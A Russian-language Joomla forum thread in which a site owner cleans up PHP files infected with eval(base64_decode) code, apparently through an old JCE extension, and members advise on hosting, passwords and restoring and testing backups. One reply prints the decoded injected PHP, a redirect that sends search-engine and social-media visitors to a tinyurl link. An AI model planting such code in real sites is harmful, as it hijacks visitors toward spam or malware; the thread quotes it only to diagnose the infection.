Вредоносный код в php - Безопасность сайтов на Joomla

Здравствуйте.
Во всех файлах php появился вредоносный код eval(base64_decode("DQ..."));

Сделал резервную копию сайта. Выгрузил на локальный компьютер. Почистил все php файлы (по крайней мере мне так кажется). Их оказалось более 2000. Это много или мало? Я не специалист. Пользовался программой regexxer из под Линукс. Теперь не знаю как это все загрузить обратно. А админ. панели Joomla  нет доступа к функции "управление резервными копиями" (Хотел загрузить по ftp архив на сайт и там уже восстановить). Выходит белый экран. Также не могу закрыть сайт на тех.обслуживание. Тот же белый экран. Не сохраняются изменения.
Что будет если я этот бэкап (в смысле разархивированный) загружу просто поверх на свой сайт по ftp?
Или уж думаю саму Jooml-y full package также перезалить поверх. Перечитал весь форум. В голове перемешалось столько информации что я не знаю что делать

Варез на сайте установлен?

Вареза на сайте нет. Был очень старый JCE оказывается. Вычитал на форуме про его уязвимость. сейчас удалил.

Первым делом я бы порекомендовал обязательно поставить в известность своего хостера и попытаться деликатно заручиться его поддержкой прежде всего.

Файлы системы Joomla никогда не проблема перезалить, но это не избавит от вируса, если он сидит вне системы, где-нибудь в папке типа /etc или ей подобной. В таком случае надежда только на профессионализм и честность хостера.

В идеале, чтобы не играть в русскую рулетку со своим сайтом, я бы уже сейчас стал готовиться к переезду на новый хостинг, чтобы запустить на нем свою систему с нуля.

хостера я поставил в известность. они сказали что помочь не могут. не прямо конечно. кстати хостера можно указать?

Вам всадили перенаправление:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://tinyurl.com/aelnwj4");
      exit();
   }
}

}

Делайте так, как вам советуют выше.

да. я уже понял об этом. думаю зря не пользовался яндексом. через Google не происходит перенапрвления. про него забыли чтоли

Вы должны регулярно делать рабочие бэкапы сайта и проверять их на восстановление. Только восстановленный бэкап - рабочий.

Вы также должны понимать, что причин взлома может быть много. Не только JCE.

В вашем случае, если так далеко зашло, закажите чистку сайта специалистам.

Кстати есть бэкап. Правда давний. Вот сейчас наверное глупость ляпну. Если я сохраню базу данных. Потом восстановлю сайт из бэкапа. Я сравнивал старый бэкап с нынешним состоянием там нет такого кода. И затем восстановлю эту базу то так много информации потеряется? Или же такнельзя сделать?

@ capricorn,

Вы правы насчет тестирования резервного копирования, но с Вашей рекомендацией по специалистам я не соглашаюсь.
Безопасность сайта - это то,  что должно быть под контролем каждого администратора Joomla прежде всего. Можно простить незнание основ оптимизации производительности сайта или его SEO, но безопасность наших сайтов - это наша личная наиглавнейшая обязанность.

Я бы порекомендовал принять этот взлом как возможность извлечь важные уроки и возрасти профессионально. Помощь сторонних спецов - это опять же игра в рулетку, где Вы отдаете безопасность веб сайта как минимум на следующих год в руки посторонних людей.  Доверять мониторинг популярному и хорошо отрегулированному сервису - это еще можно понять, но взломанный сайт? Не думаю.

@ altux,
Все указывает на переезд на новый хостинг. Это -  со стороны сайта.

Что касается вне него, то я бы порекомендовал поменять все напрямую или косвенно относящиеся к веб сайту пароли, провести глубокое форматирование своего жесткого диска и переустановить свою операционную систему, даже если она у Вас -  один из ароматов Linux, как, к примеру, Ubuntu, OpenSUSE или Mint...

Вы правы насчет тестирования резервного копирования, но с Вашей рекомендацией по специалистам я не соглашаюсь.

Сейчас вопрос стоит в восстановлении пораженного сайта. А мораль уместна после этого. Прошу прощения.

Кстати есть бэкап. Правда давний. Вот сейчас наверное глупость ляпну. Если я сохраню базу данных. Потом восстановлю сайт из бэкапа. Я сравнивал старый бэкап с нынешним состоянием там нет такого кода. И затем восстановлю эту базу то так много информации потеряется? Или же такнельзя сделать?

Можно. При этом потеряете контент, как самый худший результат. Но главное - следовать рекомендациям по обеспечению безопасности.

...Прошу прощения.

Я не вижу о чем Вам стоит извиняться.

...восстановлении пораженного сайта.

Я не в коей мере не отрицаю и не умаляю рациональное зерно в Вашей рекомендации о найме сторонних специалистов, но имхо такая стратегия больше подходит бизнесу, где для этого предусмотрен соответствующий бюджет.

... А мораль уместна после этого...

Имхо, вся мораль ситуации автора темы в том, чтобы ему лично с головой оказаться в середине этой ситуации и действовать. Установить систему с нуля на новом хостинге, нарастить ее последними версиями своих расширений и импортировать в нее предварительно проверенную старую базу данных - все дела. И Яндекс - Ваш дядя

Кстати есть бэкап. Правда давний...

Я бы не поставил и мои тапочки на кон за Ваш бэкап. С ним Вы опять же будете играть в русскую рулетку. Одно дело, когда Вы резервируете свой сайт каждую ночь, с соответствующим тестированием создаваемых резервных архивов, и в определенный день обнаруживаете взлом. В такой ситуации можно будет довериться бэкапу и откатиться на день-два-три назад. Но это же не Ваш сценарий.

Я не в коей мере не отрицаю и не умаляю рациональное зерно в Вашей рекомендации о найме сторонних специалистов, но имхо такая стратегия больше подходит бизнесу, где для этого предусмотрен соответствующий бюджет.

На мой взгляд, ТС может отделаться парой тысяч рублей, мне кажется это был примитивный взлом.

...мне кажется это был примитивный взлом.

я бы хотел разделить с Вами этот оптимизм, но у нас нет для этого твердых и голых объективных данных.

На мой взгляд, ТС может отделаться парой тысяч рублей...

я лично ценю безопасность веб сайта выше, как мнимум в два три раза, но имхо, главная ценность здесь - в обретаемом самим владельцем сайта опыте.

Я бы не поставил и мои тапочки на кон за Ваш бэкап. С ним Вы опять же будете играть в русскую рулетку. Одно дело, когда Вы резервируете свой сайт каждый день, с соответствующим тестированием создаваемых резервных архивов...

А можно для новичка уточнить, что значит "тестирование бэкапа"? Устанавливать бэкап на левый домен, чтобы опробовать его работоспособность? Разве бэкапы могут быть неполными? Я скачиваю с ftp хостинга бэкапы, но проверять на работоспособность не приходилось - как правило, если нужно, то восстанавливает хостер со своих бэкапов. А так, иди знай, рабочий он или...

Под "бэкап" или, избегая технический жаргон, "резервная копия сайта", в контексте системы Joomla в подавляющем большинстве случаев подразумевается полная копия веб сайта, созданная как правило популярным и проверенным компонентом "Akeeba Backup".

Под "тестирование бэкапа" я подразумевал удаленное тестирование созданной этим компонентом копии Вашего веб сайта в каком-либо его специально для этой цели созданном каталоге, как, к примеру, в каталоге /testme.

Извините, а можно поподробнее? Как это в специальном каталоге? Я уже хотел создать виртуальную машину, установить там денвер. И уже там тестировать бэкап.

Местно? А почему бы и нет. Это будет неплохо для Вашей практики, но все же, поскольку конфигурация Вашего местного и удаленного серверов отличаются, можно, поиграв со своим бэкапом местно, перекинуть его на удаленный.

Теперь по поводу каталога тестирования.

В настоящее время  дерево файлов и каталогов Вашего удаленного веб сайта в алфавитном порядке выглядит таким образом:

/administrator/
/caсhe/
/cli/
/components/
и так далее

создайте здесь же, на этом же уровне каталог, к примеру
/testmybackup/

Затем, создав предварительно отдельную временную базу данных 'testmybackup', загрузите в каталог 'testmybackup'  архив созданного с помощью компонента 'Akeeba Backup' бэкапа, распакуйте его там, закройте его от индексации  поисковыми роботами в файле robots.txt

User-agent: *
Disallow: /

Затем, направьте свой браузер на <адрес-вашего-вебсайта>.ru/testmybackup, выполните указания установщика расширений и при успешной установке сайта протестируйте его функционал. Вот и все.

Надеюсь это поможет.

В настоящее время  дерево файлов и каталогов Вашего удаленного веб сайта в алфавитном порядке выглядит таким образом:

/administrator/
/caсhe/
/cli/
/components/
и так далее

создайте здесь же, на этом же уровне каталог, к примеру
/testmybackup/

Затем, создав предварительно отдельную временную базу данных 'testmybackup', загрузите в каталог 'testmybackup'  архив созданного с помощью компонента 'Akeeba Backup' бэкапа, распакуйте его там, закройте его от индексации  поисковыми роботами в файле robots.txt

User-agent: *
Disallow: /

Затем, направьте свой браузер на <адрес-вашего-вебсайта>.ru/testmybackup, выполните указания установщика расширений и при успешной установке сайта протестируйте его функционал. Вот и все.

Надеюсь это поможет.

Спасибо за такое простое решение.

Все таки я смог восстановить свой сайт  . Большое спасибо AlexSmirnov и capricorn за ваше участие.

Нет проблем. Успехов с сайтом